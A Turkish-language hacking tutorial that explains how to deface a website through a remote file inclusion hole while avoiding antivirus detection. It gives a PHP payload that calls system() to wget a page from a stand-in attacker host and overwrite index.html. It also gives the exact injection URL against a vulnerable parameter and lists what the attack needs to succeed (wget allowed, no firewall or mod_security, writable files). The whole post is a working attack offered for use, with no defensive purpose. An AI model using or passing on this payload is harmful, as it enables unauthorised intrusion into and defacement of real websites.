Bazı serverlar oluyor ki iyi bir antivirüs tarafından korunuyorlar.r58,c99 gibi sheller de zararlı yazılım olduğundan dolayı antivirüslerce silinmekte ve deface işlemi yapılamamkta. Rfi açığı olan bir siteye kodumuzu şu şekilde injekte edeceğiz www.site.com/index.php?falan= burda rfi olsun
bir txt dosyası oluşturun içine de şu kodları yazın

<?php
system (”wget http://www.saldirgan.com/hacked.html -o index.html”);
echo (”Deface tamamlandi anasayfaya bakin”);
?>

bu txt dosyasını http://www.saldirgan.com/x.txt diye kaydedin ve şöyle çalıştıralım

http://www.site.com/index.php?falan=http://www.saldirgan.com/x.txt?

şöyle bir mesaj yazacak “Deface tamamlandi anasayfaya bakin”
index.html’ye baktığımızda http://www.saldirgan.com/hacked.html içeriğinin index.html’ye işlendiğini göreceğiz çünkü sistem wget ile onu alıp index.html’ye yazdı
antivirüsleri uyandırmadan deface yapmak böyle oluyor.
tabi wget şeysine izin veriliyor olması gerekiyore bide firewall veya modsecurity açıksa olmaz büyük ihtimal.index.html’nin de yazılabilir olması gerekiyor.System fonksiyonunun aktif olması gerekiyor